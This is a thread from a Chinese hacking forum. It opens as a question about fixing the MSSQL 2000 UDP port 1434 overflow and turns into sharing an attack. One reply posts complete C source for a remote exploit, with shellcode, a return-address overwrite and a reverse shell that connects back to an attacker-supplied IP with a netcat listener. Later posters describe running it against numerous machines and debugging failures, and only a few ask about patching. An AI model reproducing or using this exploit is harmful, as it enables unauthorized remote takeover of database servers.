20CN网络安全小组论坛 - 黑客进阶 - MSSQL2000 UDP remote 溢出漏洞有没有解决方案？

论坛: 黑客进阶标题: MSSQL2000 UDP remote 溢出漏洞有没有解决方案？

复制本贴地址

作者: wust [wust]

论坛用户

MSSQL2000 UDP remote 溢出漏洞有没有解决方案？我给系统打了sp3,sp4,还是不行，请高手帮忙！

地主发表时间: 11/28 17:31

回复: aspuf [aspuf]

论坛用户

原来你也有这个烦恼啊:(
大家一起找吧:(
你是做什么的？
交个朋友啊?
OICQ:78707521

B1层发表时间: 11/28 17:47

回复: olo [olo]

论坛用户

到微软中国去看看吧？具体的我也不知道！

B2层发表时间: 11/28 18:50

回复: wust [wust]

论坛用户

找到一个SQL Server 2000 Service Pack 1 Chinese (Simplified) Version
不知道这个有没有用，是June 15, 2001发布的，谁有MSSQL2000 UDP remote
的详细资料，这个漏洞是什么时候出来的？

B3层发表时间: 11/28 19:00

回复: tabris17 [tabris17]

论坛用户

在绿盟也看到过这问题

最近好像很多人关心嘛

B4层发表时间: 11/28 20:18

回复: syshunter [syshunter]

版主

今天早上测试了23台机器，晕，没一个成功，和我作对。

B5层发表时间: 11/29 10:12

回复: firewood [firewood]

论坛用户

#include <stdio.h>
#include <winsock.h>

#pragma comment (lib,"Ws2_32")

int GainControlOfSQL(void);
int StartWinsock(void);

struct sockaddr_in c_sa;
struct sockaddr_in s_sa;

struct hostent *he;
SOCKET sock;
unsigned long addr;
int SQLUDPPort=1434;
char host[256]="";
char request[4000]="\x04";
char ping[8]="\x02";

char exploit_code[]=
"\x55\x8B\xEC\x68\x18\x10\xAE\x42\x68\x1C"
"\x10\xAE\x42\xEB\x03\x5B\xEB\x05\xE8\xF8"
"\xFF\xFF\xFF\xBE\xFF\xFF\xFF\xFF\x81\xF6"
"\xAE\xFE\xFF\xFF\x03\xDE\x90\x90\x90\x90"
"\x90\x33\xC9\xB1\x44\xB2\x58\x30\x13\x83"
"\xEB\x01\xE2\xF9\x43\x53\x8B\x75\xFC\xFF"
"\x16\x50\x33\xC0\xB0\x0C\x03\xD8\x53\xFF"
"\x16\x50\x33\xC0\xB0\x10\x03\xD8\x53\x8B"
"\x45\xF4\x50\x8B\x75\xF8\xFF\x16\x50\x33"
"\xC0\xB0\x0C\x03\xD8\x53\x8B\x45\xF4\x50"
"\xFF\x16\x50\x33\xC0\xB0\x08\x03\xD8\x53"
"\x8B\x45\xF0\x50\xFF\x16\x50\x33\xC0\xB0"
"\x10\x03\xD8\x53\x33\xC0\x33\xC9\x66\xB9"
"\x04\x01\x50\xE2\xFD\x89\x45\xDC\x89\x45"
"\xD8\xBF\x7F\x01\x01\x01\x89\x7D\xD4\x40"
"\x40\x89\x45\xD0\x66\xB8\xFF\xFF\x66\x35"
"\xFF\xCA\x66\x89\x45\xD2\x6A\x01\x6A\x02"
"\x8B\x75\xEC\xFF\xD6\x89\x45\xEC\x6A\x10"
"\x8D\x75\xD0\x56\x8B\x5D\xEC\x53\x8B\x45"
"\xE8\xFF\xD0\x83\xC0\x44\x89\x85\x58\xFF"
"\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45"
"\x84\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98"
"\x8D\xBD\x48\xFF\xFF\xFF\x57\x8D\xBD\x58"
"\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83"
"\xC0\x01\x50\x83\xE8\x01\x50\x50\x8B\x5D"
"\xE0\x53\x50\x8B\x45\xE4\xFF\xD0\x33\xC0"
"\x50\xC6\x04\x24\x61\xC6\x44\x24\x01\x64"
"\x68\x54\x68\x72\x65\x68\x45\x78\x69\x74"
"\x54\x8B\x45\xF0\x50\x8B\x45\xF8\xFF\x10"
"\xFF\xD0\x90\x2F\x2B\x6A\x07\x6B\x6A\x76"
"\x3C\x34\x34\x58\x58\x33\x3D\x2A\x36\x3D"
"\x34\x6B\x6A\x76\x3C\x34\x34\x58\x58\x58"
"\x58\x0F\x0B\x19\x0B\x37\x3B\x33\x3D\x2C"
"\x19\x58\x58\x3B\x37\x36\x36\x3D\x3B\x2C"
"\x58\x1B\x2A\x3D\x39\x2C\x3D\x08\x2A\x37"
"\x3B\x3D\x2B\x2B\x19\x58\x58\x3B\x35\x3C"
"\x58";

int main(int argc, char *argv[])
{
unsigned int ErrorLevel=0,len=0,c =0;
int count = 0;
char sc[300]="";
char ipaddress[40]="";
unsigned short port = 0;
unsigned int ip = 0;
char *ipt="";
char buffer[400]="";
unsigned short prt=0;
char *prtt="";

if(argc != 2 && argc != 5)
{
printf("SQL Server UDP Buffer Overflow \r\n\n");
printf("Usage:\r\n");
printf("  %s Target [<NCHost> <NCPort> <SQLSP>]\r\n\n", argv[0]);
printf("Exemple:\r\n");
printf("Target is MSSQL SP 0:\r\n");
printf("  C:\\>nc -l -p 53\r\n");
printf("  C:\\>%s db.target.com 202.202.202.202 53 0\r\n",argv[0]);
printf("Target is MSSQL SP 1 or 2:\r\n");
printf("  c:\\>%s db.target.com 202.202.202.202\r\n\n", argv[0]);
return 0;
}

strncpy(host, argv[1], 100);

if(argc == 5)
{
strncpy(ipaddress, argv[2], 36);

port = atoi(argv[3]);

// SQL Server 2000 Service pack level
// The import entry for GetProcAddress in sqlsort.dll
// is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae101C
// Need to set the last byte accordingly

if(argv[4][0] == 0x30)
{
printf("MSSQL SP 0. GetProcAddress @0x42ae1010\r\n");
exploit_code[9]=0x10;
}
else
{
printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101C\r\n");
}

}

ErrorLevel = StartWinsock();
if(ErrorLevel==0)
{
printf("Starting Winsock Error.\r\n");
return 0;
}

if(argc == 2)
{
strcpy(request,ping);

GainControlOfSQL();
return 0;
}

strcpy(buffer,exploit_code);

// set this IP address to connect back to
// this should be your address
ip = inet_addr(ipaddress);
ipt = (char*)&ip;
buffer[142]=ipt[0];
buffer[143]=ipt[1];
buffer[144]=ipt[2];
buffer[145]=ipt[3];

// set the TCP port to connect on
// netcat should be listening on this port
// e.g. nc -l -p 80

prt = htons(port);
prt = prt ^ 0xFFFF;
prtt = (char *) &prt;
buffer[160]=prtt[0];
buffer[161]=prtt[1];

strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX");

// Overwrite the saved return address on the stack
// This address contains a jmp esp instruction
// and is in sqlsort.dll.

strcat(request,"\xDC\xC9\xB0\x42"); // 0x42B0C9DC

// Need to do a near jump
strcat(request,"\xEB\x0E\x41\x42\x43\x44\x45\x46");

// Need to set an address which is writable or
// sql server will crash before we can exploit
// the overrun. Rather than choosing an address
// on the stack which could be anywhere we'll
// use an address in the .data segment of sqlsort.dll
// as we're already using sqlsort for the saved
// return address

// SQL 2000 no service packs needs the address here
strcat(request,"\x01\x70\xAE\x42");

// SQL 2000 Service Pack 2 needs the address here
strcat(request,"\x01\x70\xAE\x42");

// just a few nops
strcat(request,"\x90\x90\x90\x90\x90\x90\x90\x90");

// tack on exploit code to the end of our request and fire it off
strcat(request,buffer);

GainControlOfSQL();

return 0;
}

int StartWinsock()
{
int err=0;
WORD wVersionRequested;
WSADATA wsaData;

wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
{
return 0;
}
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
  {
    WSACleanup( );
    return 0;
}

if (isalpha(host[0]))
{
he = gethostbyname(host);
  }
else
{
addr = inet_addr(host);
he = gethostbyaddr((char *)&addr, sizeof(struct in_addr),AF_INET);
}

if (he == NULL)
{
return 0;
}

s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
return 1;
}

int GainControlOfSQL(void)
{
// SOCKET c_sock;

char resp[600]="";
// char *ptr;
// char *foo;
int snd=0,rcv=0,count=0, var=0;
unsigned int ttlbytes=0;
unsigned int to=2000;
// struct sockaddr_in    srv_addr;
struct sockaddr_in    cli_addr;
// LPSERVENT      srv_info;
// LPHOSTENT      host_info;
SOCKET      cli_sock;

cli_sock=socket(AF_INET,SOCK_DGRAM,0);
if (cli_sock==INVALID_SOCKET)
{
return printf("sock erron\r\n");
}

cli_addr.sin_family=AF_INET;
cli_addr.sin_addr.s_addr=INADDR_ANY;
cli_addr.sin_port=htons((unsigned short)53);

setsockopt(cli_sock,SOL_SOCKET,SO_RCVTIMEO,(char *)&to,sizeof(unsigned int));
if(bind(cli_sock,(LPSOCKADDR)&cli_addr,sizeof(cli_addr))==SOCKET_ERROR)
{
return printf("bind error");
}

s_sa.sin_port=htons((unsigned short)SQLUDPPort);

if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
{
return printf("Connect error");
}
else
{
snd=send(cli_sock, request , strlen (request) , 0);
printf("Packet sent!\r\n");
printf("If you don't have a shell it didn't work.\r\n");
rcv = recv(cli_sock,resp,596,0);
if(rcv > 1)
{
while(count < rcv)
{
if(resp[count]==0x00)
resp[count]=0x20;
count++;
}
printf("%s",resp);
}
}
closesocket(cli_sock);

return 0;
}

B6层发表时间: 11/29 11:52

回复: wust [wust]

论坛用户

我试了几台机子，每次都成功。这个和网速有关，网速慢会溢出得慢一些

B7层发表时间: 11/29 16:02

回复: andychang [andychang]

论坛用户

高手

B8层发表时间: 11/29 18:27

回复: wust [wust]

论坛用户

对了,这还和对方的机子有关,如果不是win2000,你也不会成功
unix(linul)搞不定

B9层发表时间: 11/29 20:01

回复: kuaidao [k1]

论坛用户

为什么我还少成功啊。。。
提示it you did not have shelll it did not work ..
好久没成果了

B10层发表时间: 12/07 00:49

回复: chenaxiu [chenaxiu]

论坛用户

呵，我使啦，没效果。。。。。

B11层发表时间: 12/07 00:55

回复: wust [wust]

论坛用户

MSSQL SP 0. GetProcAddress @0x42ae1010

bind error
这是什么原因?

B12层发表时间: 12/16 17:33

回复: merlin [merlin]

论坛用户

怎么补？
我的服务器上试了，也溢出！

B13层发表时间: 12/18 17:45

回复: wust [wust]

论坛用户

为什么不能用了?sql2
打上补丁，mssql-sp2

B14层发表时间: 12/19 18:22

回复: hcz [hcz]

论坛用户

在那里有介绍的，给个地址

B15层发表时间: 07/05 01:03

回复: hcz [hcz]

论坛用户

英文的看不懂啊，sql2怎么用啊

B16层发表时间: 07/05 19:57

论坛: 黑客进阶